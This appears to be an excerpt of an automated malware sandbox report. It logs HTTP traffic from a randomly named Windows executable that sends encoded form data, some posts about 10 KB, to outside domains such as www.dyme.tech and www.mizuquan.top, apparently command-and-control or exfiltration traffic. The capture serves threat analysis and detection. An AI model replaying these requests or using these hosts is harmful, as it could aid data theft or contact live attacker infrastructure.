                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.44976191.184.0.200801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:34.343224049 CEST549OUTGET /ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:34.954703093 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:34 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.44976213.248.169.48801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:40.024842978 CEST801OUTPOST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 39 6c 78 37 44 36 76 47 64 45 61 50 6f 65 77 76 63 59 76 37 5a 73 47 78 45 39 6c 7a 42 55 46 78 51 3d 3d
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Kt9lx7D6vGdEaPoewvcYv7ZsGxE9lzBUFxQ==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.44976313.248.169.48801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:42.565227985 CEST821OUTPOST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 49 31 73 44 30 52 2b 43 70 4d 71 52 6e 4c 41 4f 63 35 2b 4f 53 72 31 41 59 58 51 68 4e 68 47 4c 59 3d
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZI1sD0R+CpMqRnLAOc5+OSr1AYXQhNhGLY=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.44976413.248.169.48801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:45.111304998 CEST10903OUTPOST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 4d 71 4c 72 75 73 71 6f 5a 66 71 50 6b 74 37 69 51 6e 2f 53 70 31 79 44 66 6c 4f 73 4d 4f 73 64 53 66 39 48 6c 61 4e 78 6c 59 52 50 48 51 68 77 70 76 6b 77 54 59 38 42 71 35 55 69 69 45 74 33 63 78 46 4c 36 2b 77 68 64 4c 4e 58 33 7a 36 57 74 74 4e 58 37 6c 30 44 59 59 6e 34 51 57 65 75 33 7a 62 58 68 68 61 66 55 31 7a 4f 45 74 6d 4e 49 4a 6d 6b 45 30 35 39 6a 78 61 46 36 6d 6e 4d 7a 6c 47 77 70 68 44 71 77 52 54 70 30 2b 4c 6d 6b 41 77 6f 51 46 53 6f 56 6a 37 48 59 49 67 61 6d [TRUNCATED]
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/MqLrusqoZfqPkt7iQn/Sp1yDflOsMOsdSf9HlaNxlYRPHQhwpvkwTY8Bq5UiiEt3cxFL6+whdLNX3z6WttNX7l0DYYn4QWeu3zbXhhafU1zOEtmNIJmkE059jxaF6mnMzlGwphDqwRTp0+LmkAwoQFSoVj7HYIgamK9u2CKb5tcht6HltlpZeE79orTF5jipAbs3Iz1TULeC8/zak1bqwjO+7/thciCJx2o96RXw/fcTjl2+hgPGOjt0YPizGo1syqD8EhEL2KWQUZ5eytAR72dJ/hqaQOEcw2NHQmDhCSYbmU+MufFhVrmm5Ni3syWC7Y1xnpsVqNxVYpCDFffc9b4zPSZXBaN9VsmG/SCnLEyravEzbv9z50YzTL+C2b+uJVZYrg07UzBT2FBSHVRkcnThoxPNpR+VhHVRvsIbXMRVEWvKrCqdMD+Hq0UgToNxxaVUFiUMRC+uQBCbdvgUdOLthFW5s/w5oWLzHFEYRs8O6Phx3qmU86Jp5ai2MbQt+ZPwSmhwmjj5nYSzyvhdlSkxZ9yZ3XOszw7jEndhAvvSFxDSj1nkpADLAa5yyXfS9sRbSJIeshtGbLr4wROGZ4Bm8K9cdWmxTjShDiNCQv68IRs8ybT7dW6aPCPeEvi8DoyNTVj/wju93DoDHpIXFfXSP6ZosxPYUgEK94W9NfNhY5L03ElYuBenrheu+kKK/OxhP+oHGgUzDGY1bIBjJBQwX8GuBj4OAS3yfdtxKpqtdF+GlTUsb43qk/nFBr/cdupjDdXmPxUpCcKorUUi2OWm+9yru/pGHXwXupWhx9EjVqCK5tiM6/7eyYIb140pm8v [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.44976513.248.169.48801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:47.655144930 CEST539OUTGET /h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:48.123720884 CEST391INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 26 Sep 2024 07:25:48 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 251
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 30 71 74 33 46 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 46 45 2b 6b 53 34 31 33 35 73 48 4b 32 51 57 4b 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 56 2b 77 32 67 50 50 31 69 39 67 53 36 44 51 58 2f 36 4b 68 7a 38 45 42 61 37 34 50 2b 46 4f 6c 36 61 45 3d 26 6b 5a 3d 45 38 57 70 49 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.44977043.242.202.169801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:07.303767920 CEST810OUTPOST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 4e 5a 4d 4a 49 66 4e 43 45 31 42 6b 38 53 53 67 51 55 78 59 59 77 43 59 42 42 44 2b 71 55 48 64 77 3d 3d
                                                    Data Ascii: y0qt3F=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPNZMJIfNCE1Bk8SSgQUxYYwCYBBD+qUHdw==
                                                    Sep 26, 2024 09:26:08.214174032 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:08 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.44977143.242.202.169801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:09.845237017 CEST830OUTPOST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 55 78 46 47 49 33 7a 70 70 4f 47 39 39 34 38 72 70 77 55 33 76 64 34 65 37 56 77 37 66 38 48 6b 67 3d
                                                    Data Ascii: y0qt3F=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYUxFGI3zppOG9948rpwU3vd4e7Vw7f8Hkg=
                                                    Sep 26, 2024 09:26:10.737025023 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.44977243.242.202.169801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:12.392280102 CEST10912OUTPOST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 64 51 73 72 32 74 69 78 70 61 52 6f 51 6a 65 6e 55 33 30 36 6c 76 4e 2f 4e 6d 7a 62 4a 63 41 32 72 57 30 4e 6e 46 74 70 6e 4d 52 51 65 51 2b 73 31 74 46 6b 78 58 64 4f 66 57 74 71 78 5a 66 75 70 57 30 42 64 67 42 64 56 6b 56 67 62 38 54 30 56 4e 30 43 41 52 50 45 61 32 65 57 44 73 55 36 32 44 67 70 4a 35 37 6c 54 34 59 73 52 71 76 51 62 42 55 2f 4b 57 46 69 38 46 35 41 2f 32 46 52 66 50 65 49 71 62 69 65 47 41 66 2f 6a 75 42 35 2b 41 44 54 48 45 6b 79 45 59 6c 51 39 76 65 57 66 [TRUNCATED]
